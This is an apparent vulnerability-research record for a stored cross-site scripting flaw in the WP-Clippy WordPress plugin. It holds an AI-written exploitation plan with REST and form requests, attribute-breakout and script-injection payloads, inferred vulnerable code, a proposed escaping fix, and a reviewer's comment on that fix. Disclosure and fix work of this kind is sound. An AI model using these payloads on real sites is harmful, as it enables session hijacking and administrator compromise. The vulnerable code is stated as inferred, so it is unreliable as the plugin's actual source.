[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJFeps68mb-TzSvEyigrTQunIFmg_DDo5JmXOftw4VLE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-5505","wp-clippy-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","WP-Clippy \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `clippy` shortcode in all versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes. 
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-clippy",null,"\u003C=1.0.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:06:40","2026-05-05 02:26:58",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fec49ed83-a09d-460d-be34-0fb79032b543?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to demonstrate a Stored Cross-Site Scripting (XSS) vulnerability in the WP-Clippy plugin (\u003C= 1.0.0).\n\n## 1. Vulnerability Summary\nThe **WP-Clippy** plugin is vulnerable to Stored XSS via the `[clippy]` shortcode. The plugin fails to sanitize or escape user-supplied attributes (such as `agent` or `text`) before rendering them in the HTML output. A user with **Contributor-level permissions** or higher can embed a malicious shortcode in a post or page. When any user (including an administrator) views that post, the injected script executes in their browser context.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for post creation\u002Fediting) or the WordPress REST API `wp-json\u002Fwp\u002Fv2\u002Fposts`.\n*   **Vulnerable Component:** Shortcode processing logic for `[clippy]`.\n*   **Payload Parameter:** Shortcode attributes (e.g., `agent`, `text`, `image`).\n*   **Authentication:** Authenticated (Contributor+). Contributors can create posts and use shortcodes but cannot use `unfiltered_html`.\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file or an included loader:\n    `add_shortcode( 'clippy', 'clippy_shortcode_handler' );`\n2.  
**Input:** A Contributor saves a post containing: `[clippy agent='\u003Cscript>alert(1)\u003C\u002Fscript>']`.\n3.  **Processing:** When a user visits the post, WordPress calls `the_content` filter, which invokes `do_shortcode()`.\n4.  **Shortcode Handler:** The `clippy_shortcode_handler($atts)` function is executed. It likely uses `shortcode_atts()` to merge user input with defaults.\n5.  **Sink:** The handler returns a string containing the attributes concatenated directly into HTML:\n    `return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . $atts['agent'] . '\">\u003C\u002Fdiv>';`\n6.  **Rendering:** The unescaped HTML is printed to the page, leading to XSS.\n\n## 4. Nonce Acquisition Strategy\nTo inject the shortcode via the web UI (rather than WP-CLI), the agent must obtain a nonce for the WordPress post editor.\n\n1.  **Identify Shortcode Activation:** The `[clippy]` shortcode does not require a specific script to be loaded for the *vulnerability* to exist (it exists in the PHP rendering), but viewing the results requires the post to be published.\n2.  **Navigate to Editor:** Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:**\n    *   For the Classic Editor: `browser_eval(\"document.querySelector('#_wpnonce')?.value\")`.\n    *   For the Block Editor (Gutenberg): The agent can use the REST API. The nonce is typically found in `window.wpApiSettings.nonce`.\n    *   **JS Localization Key:** `window.wpApiSettings?.nonce`.\n\n## 5. 
Exploitation Strategy\nThe goal is to create a post containing a malicious shortcode and verify its execution.\n\n### Step 1: Create a Malicious Post (REST API Method)\n**Request:**\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts HTTP\u002F1.1\nContent-Type: application\u002Fjson\nX-WP-Nonce: [EXTRACTED_NONCE]\n\n{\n  \"title\": \"XSS Test\",\n  \"content\": \"[clippy agent='\\\" onmouseover=\\\"alert(document.domain)\\\" style=\\\"width:1000px;height:1000px;display:block;\\\"' text='Click me']\",\n  \"status\": \"publish\"\n}\n```\n*Note: Using an attribute breakout `\\\" onmouseover=...` is often more reliable if the attribute is wrapped in double quotes in the source.*\n\n### Step 2: Trigger the XSS\n1.  Obtain the URL of the newly created post from the JSON response (`link` field).\n2.  Use `browser_navigate` to visit the post URL as an Administrator.\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Plugin Activation:** Ensure `wp-clippy` is active.\n    `wp plugin activate wp-clippy`\n\n## 7. Expected Results\n*   The HTTP response for post creation should be `201 Created`.\n*   When navigating to the post, the HTML source should reveal the injected payload unescaped:\n    `\u003Cdiv ... data-agent=\"\" onmouseover=\"alert(document.domain)\" ...>\u003C\u002Fdiv>`\n*   The `browser_eval` of `alert` should be triggered, or the agent should detect the payload in the DOM.\n\n## 8. Verification Steps\nAfter the HTTP exploit, confirm the post content in the database:\n```bash\nwp post list --post_type=post --format=csv\nwp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test' LIMIT 1;\"\n```\nCheck if the output contains the raw, unescaped shortcode.\n\n## 9. 
Alternative Approaches\nIf the `agent` attribute is sanitized, try other potential attributes inferred from standard Clippy implementations:\n*   `[clippy text='\u003Cimg src=x onerror=alert(1)>']` (HTML Body injection)\n*   `[clippy image='\">\u003Cscript>alert(1)\u003C\u002Fscript>']` (Attribute breakout)\n*   `[clippy callback='alert(1)']` (If the plugin supports JS callbacks)\n\nIf the REST API is disabled, use the Classic Editor submission:\n**Request:**\n```http\nPOST \u002Fwp-admin\u002Fpost.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=editpost&post_ID=[ID]&_wpnonce=[NONCE]&content=[clippy agent='\u003Cscript>alert(1)\u003C\u002Fscript>']\n```","The WP-Clippy plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `[clippy]` shortcode in versions up to 1.0.0. The plugin fails to sanitize or escape user-supplied attributes such as 'agent' or 'text' before rendering them in the HTML output. This allows authenticated attackers with Contributor-level access to inject arbitrary web scripts that execute when any user views the affected post.","\u002F\u002F Inferred from research plan: Shortcode handler logic\nfunction clippy_shortcode_handler($atts) {\n    $atts = shortcode_atts(array(\n        'agent' => 'clippy',\n        'text'  => 'Hi, how can I help?',\n    ), $atts);\n\n    \u002F\u002F Vulnerable sink: Shortcode attributes are concatenated directly into HTML without escaping\n    return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . $atts['agent'] . '\">' . $atts['text'] . '\u003C\u002Fdiv>';\n}\nadd_shortcode('clippy', 'clippy_shortcode_handler');","--- wp-clippy.php\n+++ wp-clippy.php\n@@ -6,5 +6,5 @@\n     ), $atts);\n \n-    return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . $atts['agent'] . '\">' . $atts['text'] . '\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"clippy-container\" data-agent=\"' . esc_attr($atts['agent']) . '\">' . wp_kses_post($atts['text']) . 
'\u003C\u002Fdiv>';\n }","The exploit is carried out by an authenticated user with at least Contributor-level permissions. 1. The attacker creates or edits a post via the WordPress dashboard or the REST API (wp-json\u002Fwp\u002Fv2\u002Fposts). 2. A malicious [clippy] shortcode is added to the post content, using an attribute breakout payload like [clippy agent='\" onmouseover=\"alert(1)\" style=\"display:block;width:500px;height:500px;\"']. 3. Once the post is saved or published, any user (including administrators) who navigates to the post's URL will trigger the payload. The injected script executes in the context of the victim's browser session, potentially allowing for session hijacking or further administrative actions.","gemini-3-flash-preview","2026-05-04 16:52:43","2026-05-04 16:53:05",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-clippy\u002Ftags"]
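Review bot: On the changed `return` line of the wp-clippy.php hunk in `research_fix_diff`, `wp_kses_post($atts['text'])` still passes post-level markup through in a value whose default (`'Hi, how can I help?'`) is plain text. If HTML in `text` is not an intended feature, `esc_html($atts['text'])` is the tighter choice and matches how `esc_attr($atts['agent'])` handles the attribute context. It would also help to add a one-line comment above the `return` stating that both values are escaped at output for their context, so a later edit that adds another attribute to the markup follows the same pattern. The record lists no patched version, so this diff should be read as a proposed fix rather than a shipped one.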